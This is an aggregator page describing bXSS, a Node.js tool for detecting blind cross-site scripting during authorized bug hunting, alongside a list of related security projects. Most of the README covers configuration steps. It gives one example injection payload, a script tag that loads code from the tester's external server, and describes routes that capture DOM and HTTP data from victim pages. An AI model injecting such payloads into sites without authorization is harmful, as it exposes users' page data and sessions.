LewisArdern / Bxss
Licence: mit
bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting.
Stars: ✭ 331
Programming Languages
javascript
184084 projects - #8 most used programming language
Projects that are alternatives of or similar to Bxss
PastebinMarkdownXSS
XSS in pastebin.com and reddit.com via unsanitized markdown output
Stars: ✭ 84 (-74.62%)
Mutual labels: xss, infosec, bugbounty
Android Reports And Resources
A big list of Android Hackerone disclosed reports and other resources.
Stars: ✭ 590 (+78.25%)
Mutual labels: infosec, xss, bugbounty
Defaultcreds Cheat Sheet
One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password 🛡️
Stars: ✭ 1,949 (+488.82%)
Mutual labels: infosec, blueteam, bugbounty
Findom Xss
A fast DOM based XSS vulnerability scanner with simplicity.
Stars: ✭ 310 (-6.34%)
Mutual labels: xss, bugbounty
Go Dork
The fastest dork scanner written in Go.
Stars: ✭ 274 (-17.22%)
Mutual labels: infosec, bugbounty
targets
A collection of over 5.1 million sub-domains and assets belonging to public bug bounty programs, compiled into a repo, for performing bulk operations.
Stars: ✭ 85 (-74.32%)
Mutual labels: infosec, bugbounty
osmedeus-workflow
Community Workflow for the Osmedeus Engine that describes basic reconnaissance methodology for you to build your own
Stars: ✭ 26 (-92.15%)
Mutual labels: infosec, bugbounty
Pentesting
Misc. Public Reports of Penetration Testing and Security Audits.
Stars: ✭ 24 (-92.75%)
Mutual labels: infosec, bugbounty
Bootsy
Designed to be installed on a fresh install of raspbian on a raspberry pi, by combining Respounder (Responder detection) and Artillery (port and service spoofing) for network deception, this tool allows you to detect an attacker on the network quickly by weeding out general noisy alerts with only those that matter.
Stars: ✭ 33 (-90.03%)
Mutual labels: infosec, blueteam
Bugbounty Cheatsheet
A list of interesting payloads, tips and tricks for bug bounty hunters.
Stars: ✭ 3,644 (+1000.91%)
Mutual labels: infosec, bugbounty
Eagle
Multithreaded Plugin based vulnerability scanner for mass detection of web-based applications vulnerabilities
Stars: ✭ 85 (-74.32%)
Mutual labels: xss, bugbounty
Xxe Injection Payload List
🎯 XML External Entity (XXE) Injection Payload List
Stars: ✭ 304 (-8.16%)
Mutual labels: infosec, bugbounty
H2csmuggler
HTTP Request Smuggling over HTTP/2 Cleartext (h2c)
Stars: ✭ 292 (-11.78%)
Mutual labels: infosec, bugbounty
T1tl3
A simple python script which can check HTTP status of branch of URLs/Subdomains and grab URLs/Subdomain title
Stars: ✭ 14 (-95.77%)
Mutual labels: infosec, bugbounty
pyc2bytecode
A Python Bytecode Disassembler helping reverse engineers in dissecting Python binaries by disassembling and analyzing the compiled python byte-code(.pyc) files across all python versions (including Python 3.10.*)
Stars: ✭ 70 (-78.85%)
Mutual labels: infosec, blueteam
Application Security Engineer Interview Questions
Some of the questions which i was asked when i was giving interviews for Application/Product Security roles. I am sure this is not an exhaustive list but i felt these questions were important to be asked and some were challenging to answer
Stars: ✭ 267 (-19.34%)
Mutual labels: infosec, xss
bXSS
bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting.
bXSS supports the following:
- Intrusive Levels
- Twilio
- Slack
- Webex Teams
- Discord
- Github
- Payload Generation
- Save locally
Requirements
Necessary
- Server you control
- Usable domain
- Node.js and Express.js
Optional
- SMTP
- Twilio Account
- Slack Token
- Cisco Token
- Discord Token
- Github Access Token
- Twitter Developer Account
- SSL/TLS Certificate
Step-Up
Default
- cd bXSS && npm install
- Update The Configuration || Environment Variables
- Domain
- config.url = Domain intended for use e.g ardern.io
- config.port.http = Port to run the Node.js app e.g 80
- Domain
- Rename configExample.js to config.js
Configuring Services
Services are optional, by default bXSS will save a markdown file to disk. If you don't want to use any service documented below, just delete the service from the config.
- Twilio
- config.twilio.accountSid = Twilio SID
- config.twilio.authToken = Twilio Auth Token
- config.twilio.to = ['+447500000000','+0018056826043'] Your telephone number(s)
- config.twilio.from = Twilio telephone number
- Slack
- config.slack.token = Slack Token
- config.slack.channel = Channel you want to send the report to
- Slack permissions required channels:read and chat:write
- Cisco
- config.ciscoSpark.token = Cisco Token
- config.ciscoSpark.sparkRoom = ['[email protected]','[email protected]']
- Discord
- Steps to create a bot:
- Visit https://discordapp.com/developers/applications/
- Create a new application (e.g bXSSForCompany)
- Make a note of your CLIENT ID
- Select 'Bot'
- Choose a USERNAME and press 'Click to Reveal Token' (copy the token)
- Visit the following URL (update with your CLIENT ID) https://discordapp.com/oauth2/authorize?&client_id=YOUR_CLIENT_ID&scope=bot&permissions=2048
- Select the server you want your bot to join and authorize
- Update the following values below for the bot to post to the 'text channel' e.g ('general')
- config.discord.token = 'your bot token'
- config.discord.channel = 'channel you want it to join, e.g general'
- Steps to create a bot:
- Twitter
- config.twitter.consumer_key = API Key
- config.twitter.consumer_secret = API Secret Key
- config.twitter.access_token_key = Application Access Token
- config.twitter.access_token_secret = Application Access Token Secret
- Permissions (Write)
- config.twitter.recipient_id = Twitter User ID, which can be found here
- SMTP
- config.smtp.user = email username
- config.smtp.pass = email password
- config.smtp.port = port you are connecting to e.g 465
- config.smtp.host = host you are connecting to e.g smtp.example.com
- config.smtp.to = ['[email protected]','[email protected]'] Where you want to send the emails
- config.smtp.tls = Use TLS, boolean true or false
- Github
- config.github.accessToken = ''
- config.github.repo = '' an example is lewisardern/bXSS
Setting Up HTTPS
Consider using a reverse proxy, for example in NGINX, but if you want to configure HTTPS using express, follow the steps below:
- Obtain a let's Encrypt cert
- Using Node.js
- Update Configuration
- config.letsEncrypt.TLS = true;
- config.letsEncrypt.publicKey = $Path/fullchain.pem
- config.letsEncrypt.privateKey = $Path/privkey.pem
- config.letsEncrypt.ca = $Path/chain.pem
- config.port.https = 443
- Update Configuration
Starting The Application
Once you have configured the above, simply start the server with any available utility at the application root directory:
- node app.js
- nodemon app.js
- pm2 start app.js
Using
Once the application is functional, you would just identify sites you are authorized to test and start to inject different payloads that will attempt to load your resource, the easiest example is:
"><script src="https://example.com/m"></script>
The application has the following routes:
- POST - /m (Captures DOM information)
- GET - /mH (Captures HTTP interactions)
- GET - /alert (displays alert(1))
- GET - /payloads (Gives payloads you can use for testing blind xss)
- GET - /** (All other routes load the payload)
Contribute?
If you like the project, feel free to contribute or if you want to suggest improvements or notice any problems, file a issue.
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].